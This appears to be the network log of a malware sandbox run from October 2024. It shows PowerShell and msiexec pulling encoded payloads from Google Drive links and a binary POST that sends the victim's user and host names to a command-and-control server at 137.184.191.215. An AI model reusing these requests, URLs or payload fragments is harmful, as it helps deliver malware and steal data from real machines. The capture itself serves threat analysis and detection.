                                        26192.168.2.459110137.184.191.215808076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        Oct 2, 2024 07:20:25.428327084 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 137.184.191.215
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: 1A0CD362
                                        Content-Length: 149
                                        Connection: close
                                        Oct 2, 2024 07:20:25.433687925 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 39 00 30 00 31 00 32 00 30 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                        Data Ascii: (ckav.rujones390120JONES-PC0FDD42EE188E931437F4FBE2C
                                        Oct 2, 2024 07:20:28.120699883 CEST1236INHTTP/1.0 500 Internal Server Error
                                        Date: Wed, 02 Oct 2024 05:20:25 GMT
                                        Server: Apache/2.4.52 (Ubuntu)
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Content-Length: 2557
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                        Oct 2, 2024 07:20:28.121135950 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                        Oct 2, 2024 07:20:28.121146917 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.449730172.217.18.144437408C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-02 05:18:24 UTC215OUTGET /uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7 HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: drive.google.com
                                        Connection: Keep-Alive
                                        2024-10-02 05:18:24 UTC1610INHTTP/1.1 303 See Other
                                        Content-Type: application/binary
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Wed, 02 Oct 2024 05:18:24 GMT
                                        Location: https://drive.usercontent.google.com/download?id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7&export=download
                                        Strict-Transport-Security: max-age=31536000
                                        Content-Security-Policy: script-src 'nonce-AjdkBo8IFCx3tbZN86YLAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                        Cross-Origin-Opener-Policy: same-origin
                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                        Server: ESF
                                        Content-Length: 0
                                        X-XSS-Protection: 0
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.449731172.217.18.144437408C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-02 05:18:29 UTC121OUTGET /uc?export=download&id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7 HTTP/1.1
                                        Host: drive.google.com
                                        Connection: Keep-Alive
                                        2024-10-02 05:18:30 UTC1319INHTTP/1.1 303 See Other
                                        Content-Type: application/binary
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Wed, 02 Oct 2024 05:18:29 GMT
                                        Location: https://drive.usercontent.google.com/download?id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7&export=download
                                        Strict-Transport-Security: max-age=31536000
                                        Content-Security-Policy: script-src 'report-sample' 'nonce-kYJxPlj0OAb3IAThFCEXGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                        Cross-Origin-Opener-Policy: same-origin
                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        Server: ESF
                                        Content-Length: 0
                                        X-XSS-Protection: 0
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.449732142.250.186.334437408C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-02 05:18:30 UTC139OUTGET /download?id=1QtOkBJWLLx3DwBCgRL8QZa0hYU0wtSj7&export=download HTTP/1.1
                                        Host: drive.usercontent.google.com
                                        Connection: Keep-Alive
                                        2024-10-02 05:18:33 UTC4851INHTTP/1.1 200 OK
                                        Content-Type: application/octet-stream
                                        Content-Security-Policy: sandbox
                                        Content-Security-Policy: default-src 'none'
                                        Content-Security-Policy: frame-ancestors 'none'
                                        X-Content-Security-Policy: sandbox
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Resource-Policy: same-site
                                        X-Content-Type-Options: nosniff
                                        Content-Disposition: attachment; filename="Catrine.pfb"
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                        Accept-Ranges: bytes
                                        Content-Length: 468128
                                        Last-Modified: Mon, 30 Sep 2024 03:52:44 GMT
                                        X-GUploader-UploadID: AD-8ljsj19DS8BH25B1LGTGXkbKSGWGEUd_QotDDHk1K8bKiCNE0SfHjib8Gtd2IeGGkzS7qSZfAkVMSTQ
                                        Date: Wed, 02 Oct 2024 05:18:33 GMT
                                        Expires: Wed, 02 Oct 2024 05:18:33 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=7/JiXg==
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close
                                        2024-10-02 05:18:33 UTC4851INData Raw: 63 51 47 62 36 77 4b 41 69 4c 73 5a 57 51 6f 41 36 77 4b 78 69 33 45 42 6d 77 4e 63 4a 41 54 72 41 6d 75 44 36 77 4b 4e 32 62 6b 4e 43 6d 42 79 36 77 49 44 47 65 73 43 4a 54 71 42 38 55 44 45 57 6f 52 78 41 5a 76 72 41 72 41 46 67 66 46 4e 7a 6a 72 32 36 77 49 79 58 6e 45 42 6d 2b 73 43 49 48 6a 72 41 75 73 63 75 6a 35 67 4e 47 6e 72 41 6d 68 33 63 51 47 62 36 77 49 36 4f 6e 45 42 6d 7a 48 4b 63 51 47 62 36 77 4b 67 4d 49 6b 55 43 33 45 42 6d 2b 73 43 6c 54 62 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 48 45 42 6d 2b 73 43 30 4c 36 42 2b 61 65 70 46 51 46 38 7a 4f 73 43 51 78 42 78 41 5a 75 4c 52 43 51 45 36 77 4a 77 2b 6e 45 42 6d 34 6e 44 36 77 4b 6c 57 48 45 42 6d 34 48 44 2b 4f 65 44 41 48 45 42 6d 33 45 42 6d 37 6f 48 73 41 42 72 63 51 47 62 36 77 49
                                        Data Ascii: cQGb6wKAiLsZWQoA6wKxi3EBmwNcJATrAmuD6wKN2bkNCmBy6wIDGesCJTqB8UDEWoRxAZvrArAFgfFNzjr26wIyXnEBm+sCIHjrAuscuj5gNGnrAmh3cQGb6wI6OnEBmzHKcQGb6wKgMIkUC3EBm+sClTbR4nEBm3EBm4PBBHEBm+sC0L6B+aepFQF8zOsCQxBxAZuLRCQE6wJw+nEBm4nD6wKlWHEBm4HD+OeDAHEBm3EBm7oHsABrcQGb6wI
                                        2024-10-02 05:18:33 UTC4851INData Raw: 38 39 73 53 4b 76 50 62 45 69 72 7a 74 45 6a 58 50 66 6c 2f 78 41 6b 55 38 45 78 67 58 34 36 79 7a 42 59 30 4c 66 62 39 48 6d 41 61 6b 66 68 71 77 4a 51 30 4c 54 75 58 34 6b 6e 42 33 4c 67 53 7a 50 63 45 44 68 70 4f 4f 34 6d 47 66 58 74 4f 71 32 7a 37 31 71 4c 63 30 61 2b 30 57 71 6c 2f 52 79 65 69 4c 2f 4e 49 52 30 6e 4c 34 30 4c 56 54 6a 5a 32 46 35 71 64 50 42 78 6a 33 78 49 72 55 61 6d 5a 4a 33 70 35 71 32 32 4b 49 52 62 36 59 66 67 46 34 33 58 66 41 72 6b 4b 78 4b 71 33 76 54 55 72 7a 37 53 52 46 65 66 48 72 59 52 4d 39 48 51 66 70 53 4c 32 56 46 6a 55 58 7a 5a 4d 68 6b 45 46 46 79 76 6a 35 4c 35 37 4a 43 42 46 52 54 6a 61 74 4b 54 6a 73 41 33 33 4e 61 50 39 61 51 4a 70 56 31 57 55 2f 4f 4a 48 7a 79 55 4a 6e 65 6b 71 4d 65 52 50 38 64 4f 56 79 4b 4e
                                        Data Ascii: 89sSKvPbEirztEjXPfl/xAkU8ExgX46yzBY0Lfb9HmAakfhqwJQ0LTuX4knB3LgSzPcEDhpOO4mGfXtOq2z71qLc0a+0Wql/RyeiL/NIR0nL40LVTjZ2F5qdPBxj3xIrUamZJ3p5q22KIRb6YfgF43XfArkKxKq3vTUrz7SRFefHrYRM9HQfpSL2VFjUXzZMhkEFFyvj5L57JCBFRTjatKTjsA33NaP9aQJpV1WU/OJHzyUJnekqMeRP8dOVyKN
                                        2024-10-02 05:18:33 UTC143INData Raw: 4d 50 42 65 65 63 64 6c 5a 5a 75 41 64 75 74 32 67 2f 74 66 32 4b 53 7a 43 59 68 46 30 35 54 39 58 53 51 42 78 72 39 6a 45 6b 68 53 59 4a 2f 38 2f 45 35 58 39 42 35 72 33 32 78 4e 77 43 46 36 37 6c 35 6e 63 79 57 53 50 45 5a 67 74 36 68 4c 77 6f 75 33 2f 4b 4a 6f 4a 52 77 61 6c 46 63 69 43 38 6a 6e 79 31 4b 73 77 58 4d 6a 72 5a 38 41 79 42 53 53 38 4c 36 79 4b 34 69 4a 4d 44 48 70 43 31 6a 4a 78 55 2f 50 72 53 4e 79 33 36 35
                                        Data Ascii: MPBeecdlZZuAdut2g/tf2KSzCYhF05T9XSQBxr9jEkhSYJ/8/E5X9B5r32xNwCF67l5ncyWSPEZgt6hLwou3/KJoJRwalFciC8jny1KswXMjrZ8AyBSS8L6yK4iJMDHpC1jJxU/PrSNy365
                                        2024-10-02 05:18:33 UTC1325INData Raw: 33 7a 55 53 39 58 66 31 4e 51 4b 44 31 79 6d 70 33 31 59 59 4e 2f 70 43 30 30 4b 56 53 50 4c 64 77 56 59 44 34 6c 68 32 53 42 2f 4a 34 4f 33 61 36 4b 7a 63 6f 33 71 44 4b 71 37 4f 78 41 43 39 36 51 4a 4c 68 59 72 4d 33 6c 43 61 5a 63 38 45 30 61 68 64 44 76 66 65 2b 59 41 37 70 49 74 35 73 49 37 62 35 51 4e 4d 77 42 45 42 54 4c 39 4b 64 30 46 54 33 47 73 31 64 70 66 4b 6a 37 6e 63 6a 44 54 50 63 4c 67 6b 79 52 2b 62 55 5a 66 6c 2f 4c 58 2f 65 2f 75 6c 59 41 6a 37 59 4d 43 43 2b 4d 61 50 71 61 45 53 77 30 55 73 43 6a 55 6f 31 42 61 62 4f 33 4d 70 66 47 6d 2b 6c 73 5a 42 36 38 48 78 68 6a 6b 66 45 65 37 49 77 75 34 30 70 41 53 51 77 6c 46 6a 70 67 78 31 79 6a 77 70 48 36 68 57 36 44 34 43 30 36 48 56 34 62 64 64 7a 62 6e 4f 71 79 5a 41 37 61 41 6a 6b 68 37
                                        Data Ascii: 3zUS9Xf1NQKD1ymp31YYN/pC00KVSPLdwVYD4lh2SB/J4O3a6Kzco3qDKq7OxAC96QJLhYrM3lCaZc8E0ahdDvfe+YA7pIt5sI7b5QNMwBEBTL9Kd0FT3Gs1dpfKj7ncjDTPcLgkyR+bUZfl/LX/e/ulYAj7YMCC+MaPqaESw0UsCjUo1BabO3MpfGm+lsZB68HxhjkfEe7Iwu40pASQwlFjpgx1yjwpH6hW6D4C06HV4bddzbnOqyZA7aAjkh7
                                        2024-10-02 05:18:33 UTC1390INData Raw: 71 38 39 73 53 4b 76 50 62 45 69 72 7a 32 78 49 71 38 39 73 53 4b 76 50 34 4c 2b 70 43 37 52 59 36 59 58 6e 52 78 31 50 6e 46 6e 4d 37 32 78 49 71 38 39 73 53 4b 76 50 62 45 69 72 7a 32 78 49 71 38 39 73 53 4b 76 50 62 45 69 72 7a 32 78 49 35 74 45 73 76 42 34 71 6b 6d 50 58 76 38 72 35 63 6a 4d 38 45 42 50 64 72 67 39 6b 46 65 39 77 75 51 30 6c 77 32 68 30 6b 37 50 2f 7a 33 78 49 72 72 53 66 33 38 67 78 31 46 66 64 75 43 4f 73 41 39 4d 66 45 51 6d 4d 4a 46 66 63 61 47 33 53 38 39 4d 52 50 57 76 33 6c 4e 68 58 51 57 4f 6d 59 4f 32 57 43 44 4d 66 6b 68 35 41 57 62 4e 65 44 70 4d 30 42 4e 73 64 68 4f 49 30 73 48 36 41 79 7a 65 44 31 71 4b 4c 6d 62 32 67 52 46 4f 44 65 64 32 32 74 64 56 2f 4c 70 2b 56 43 76 67 6f 2f 54 50 6b 4f 6a 37 57 70 4e 61 37 33 33 57
                                        Data Ascii: q89sSKvPbEirz2xIq89sSKvP4L+pC7RY6YXnRx1PnFnM72xIq89sSKvPbEirz2xIq89sSKvPbEirz2xI5tEsvB4qkmPXv8r5cjM8EBPdrg9kFe9wuQ0lw2h0k7P/z3xIrrSf38gx1FfduCOsA9MfEQmMJFfcaG3S89MRPWv3lNhXQWOmYO2WCDMfkh5AWbNeDpM0BNsdhOI0sH6AyzeD1qKLmb2gRFODed22tdV/Lp+VCvgo/TPkOj7WpNa733W
                                        2024-10-02 05:18:33 UTC1390INData Raw: 38 4b 35 68 78 6c 67 42 50 63 4c 67 79 6a 74 44 6c 67 4d 70 59 38 57 4b 76 45 78 41 64 39 73 63 79 34 75 72 35 63 53 4b 76 50 62 45 69 72 7a 32 78 49 71 38 39 73 53 4b 76 50 62 45 69 72 7a 32 78 49 71 38 39 73 53 4b 76 68 62 61 75 2b 75 4a 4b 5a 6b 2f 69 70 30 4c 66 72 38 2b 75 56 31 33 42 70 6c 63 6f 44 45 4c 56 68 59 54 65 48 79 6e 66 59 74 63 73 42 77 4c 54 56 65 44 76 6e 74 33 42 56 61 31 55 7a 49 4c 56 59 70 30 6e 61 71 6c 57 41 4e 66 39 38 38 58 32 73 38 64 39 72 61 50 77 43 67 73 32 2b 76 31 5a 6f 59 72 72 69 39 71 4d 6a 4f 6a 43 79 4e 48 6a 66 77 79 4f 34 78 51 67 41 6a 34 2f 35 6a 62 58 70 42 42 53 75 64 7a 44 64 50 75 2b 63 57 38 64 76 62 45 69 72 7a 32 78 49 71 38 39 73 53 4b 76 50 62 45 69 72 7a 32 78 49 71 38 39 73 53 4b 76 50 62 45 6b 61 71
                                        Data Ascii: 8K5hxlgBPcLgyjtDlgMpY8WKvExAd9scy4ur5cSKvPbEirz2xIq89sSKvPbEirz2xIq89sSKvhbau+uJKZk/ip0Lfr8+uV13BplcoDELVhYTeHynfYtcsBwLTVeDvnt3BVa1UzILVYp0naqlWANf988X2s8d9raPwCgs2+v1ZoYrri9qMjOjCyNHjfwyO4xQgAj4/5jbXpBBSudzDdPu+cW8dvbEirz2xIq89sSKvPbEirz2xIq89sSKvPbEkaq
                                        2024-10-02 05:18:33 UTC1390INData Raw: 41 30 6c 78 59 31 46 63 57 42 49 58 4d 2b 39 37 51 6a 4c 53 51 38 33 58 76 51 41 57 54 4f 48 66 6b 44 42 35 7a 36 6b 4d 6b 67 30 4c 73 57 6b 4c 5a 56 69 61 49 66 36 4e 53 75 68 42 4c 48 35 32 74 4f 65 7a 34 58 35 4e 63 49 32 76 4f 66 69 44 66 31 63 49 6b 34 41 4a 38 4b 51 37 71 64 30 59 30 6b 54 52 63 50 39 38 53 4b 4e 53 57 58 41 53 46 46 78 59 71 38 2b 63 53 65 6d 50 62 45 69 72 7a 32 78 49 71 38 39 73 53 4b 76 50 62 45 69 72 7a 32 78 49 71 38 39 73 53 4b 76 50 62 45 6a 76 76 6e 4b 49 66 51 4a 72 52 64 5a 41 6d 76 4d 36 76 4a 58 37 67 31 65 7a 61 4c 76 50 62 4c 69 6d 64 49 78 49 71 38 39 73 53 4b 76 50 62 45 69 72 7a 32 78 49 71 38 39 73 53 4b 76 50 62 45 69 72 7a 32 78 49 71 37 75 64 72 4d 55 2f 43 72 39 41 65 4d 43 34 70 52 2f 55 31 72 37 58 31 4a 65
                                        Data Ascii: A0lxY1FcWBIXM+97QjLSQ83XvQAWTOHfkDB5z6kMkg0LsWkLZViaIf6NSuhBLH52tOez4X5NcI2vOfiDf1cIk4AJ8KQ7qd0Y0kTRcP98SKNSWXASFFxYq8+cSemPbEirz2xIq89sSKvPbEirz2xIq89sSKvPbEjvvnKIfQJrRdZAmvM6vJX7g1ezaLvPbLimdIxIq89sSKvPbEirz2xIq89sSKvPbEirz2xIq7udrMU/Cr9AeMC4pR/U1r7X1Je
                                        2024-10-02 05:18:33 UTC1390INData Raw: 76 4e 70 4e 54 4a 71 5a 51 55 61 46 48 2b 41 57 41 62 74 51 53 37 64 6d 42 73 61 37 4b 42 5a 72 62 66 31 76 64 34 43 35 69 61 46 4f 55 57 6d 79 61 4a 72 34 5a 44 70 31 67 4a 2f 36 34 71 5a 38 4e 6a 69 48 66 62 2b 2b 66 42 2f 6b 6b 55 6a 4a 49 47 75 6b 57 41 4e 65 2f 38 59 58 4f 53 65 2b 6c 36 4e 34 66 65 47 61 75 68 35 2f 36 4a 77 41 6c 39 44 30 61 6f 59 43 47 4e 63 62 33 66 62 50 74 6c 51 51 2f 54 57 2b 34 4d 38 51 34 6a 4a 50 76 31 59 68 56 65 77 35 4c 70 35 39 65 75 52 47 68 64 65 75 6b 6a 54 42 65 69 50 69 50 51 44 49 6c 65 4b 48 52 57 54 4e 5a 48 32 54 37 47 70 4e 61 72 58 47 57 62 4a 74 67 64 62 61 56 31 30 6f 56 47 59 67 78 77 53 59 30 4f 32 33 4c 54 4c 71 41 5a 78 30 4d 31 74 7a 6d 6c 4d 4e 33 73 70 6e 6c 62 4f 45 4a 51 34 32 61 72 57 48 68 44 49
                                        Data Ascii: vNpNTJqZQUaFH+AWAbtQS7dmBsa7KBZrbf1vd4C5iaFOUWmyaJr4ZDp1gJ/64qZ8NjiHfb++fB/kkUjJIGukWANe/8YXOSe+l6N4feGauh5/6JwAl9D0aoYCGNcb3fbPtlQQ/TW+4M8Q4jJPv1YhVew5Lp59euRGhdeukjTBeiPiPQDIleKHRWTNZH2T7GpNarXGWbJtgdbaV10oVGYgxwSY0O23LTLqAZx0M1tzmlMN3spnlbOEJQ42arWHhDI
                                        2024-10-02 05:18:33 UTC1390INData Raw: 75 39 6a 63 51 79 2f 55 30 79 38 2b 56 48 4d 59 50 66 54 74 62 30 47 48 4f 6d 58 43 50 35 43 41 6a 65 71 59 51 43 6e 41 35 43 72 48 77 61 46 4f 38 63 76 37 75 52 35 52 4a 77 59 4f 38 43 2f 54 4a 74 37 34 34 33 65 52 6a 58 58 75 49 47 6e 44 78 76 2b 38 68 61 32 6d 62 68 73 50 68 63 4d 51 66 4b 44 38 76 46 66 76 46 63 70 58 2f 48 56 65 45 62 43 33 2f 46 34 78 36 72 64 7a 64 4e 38 39 61 61 43 30 39 6e 58 54 4c 42 64 77 65 67 68 6a 33 75 32 79 42 2f 4a 59 75 6c 61 30 42 53 77 50 55 45 46 30 65 4a 50 37 75 6b 5a 39 37 76 65 46 33 53 36 67 2b 6d 71 58 6d 58 50 34 48 59 75 5a 6f 44 4b 61 76 34 79 46 33 64 68 49 73 68 69 34 6f 5a 66 58 37 63 52 35 79 38 72 30 42 6e 35 2f 4e 4c 6c 68 39 66 77 56 43 76 30 74 4c 61 4e 33 4d 2b 69 37 7a 32 43 4a 74 78 71 68 56 78 44
                                        Data Ascii: u9jcQy/U0y8+VHMYPfTtb0GHOmXCP5CAjeqYQCnA5CrHwaFO8cv7uR5RJwYO8C/TJt7443eRjXXuIGnDxv+8ha2mbhsPhcMQfKD8vFfvFcpX/HVeEbC3/F4x6rdzdN89aaC09nXTLBdweghj3u2yB/JYula0BSwPUEF0eJP7ukZ97veF3S6g+mqXmXP4HYuZoDKav4yF3dhIshi4oZfX7cR5y8r0Bn5/NLlh9fwVCv0tLaN3M+i7z2CJtxqhVxD
                                        2024-10-02 05:18:33 UTC1390INData Raw: 6d 49 6e 69 41 6b 68 2f 41 74 79 7a 39 7a 61 6e 76 50 62 45 69 72 7a 32 78 49 71 38 39 73 53 4b 76 50 62 45 69 72 7a 32 78 49 71 38 39 73 53 4b 76 50 62 64 79 6e 7a 49 63 38 7a 64 56 2f 77 6c 71 41 4e 79 2b 69 2b 4e 30 6c 4a 69 72 55 38 2f 39 2f 54 45 69 6e 43 66 53 66 64 4d 6c 2b 59 64 7a 77 68 32 6a 48 72 78 61 77 4f 78 4d 70 44 64 74 34 55 74 50 77 73 65 6e 4f 4d 4e 52 73 7a 4c 6f 75 4a 69 68 62 77 6f 41 59 71 38 39 73 53 4b 76 50 62 45 69 72 7a 32 78 49 71 38 39 73 53 4b 76 50 62 45 69 72 7a 32 78 49 71 38 37 44 34 68 52 71 39 6e 67 4e 67 52 77 6d 50 51 6a 4a 65 65 50 6b 35 44 4b 6c 51 65 58 59 36 38 66 59 6d 57 36 6b 69 31 76 67 53 54 52 58 78 43 33 53 41 50 50 54 44 44 6b 43 4d 47 52 55 78 6d 44 63 43 6c 4e 63 6a 39 54 76 6c 2b 45 6f 43 79 55 62 6f
                                        Data Ascii: mIniAkh/Atyz9zanvPbEirz2xIq89sSKvPbEirz2xIq89sSKvPbdynzIc8zdV/wlqANy+i+N0lJirU8/9/TEinCfSfdMl+Ydzwh2jHrxawOxMpDdt4UtPwsenOMNRszLouJihbwoAYq89sSKvPbEirz2xIq89sSKvPbEirz2xIq87D4hRq9ngNgRwmPQjJeePk5DKlQeXY68fYmW6ki1vgSTRXxC3SAPPTDDkCMGRUxmDcClNcj9Tvl+EoCyUbo


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.459082172.217.18.1104438076C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-02 05:19:04 UTC216OUTGET /uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: drive.google.com
                                        Cache-Control: no-cache
                                        2024-10-02 05:19:05 UTC1610INHTTP/1.1 303 See Other
                                        Content-Type: application/binary
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Wed, 02 Oct 2024 05:19:05 GMT
                                        Location: https://drive.usercontent.google.com/download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download
                                        Strict-Transport-Security: max-age=31536000
                                        Cross-Origin-Opener-Policy: same-origin
                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
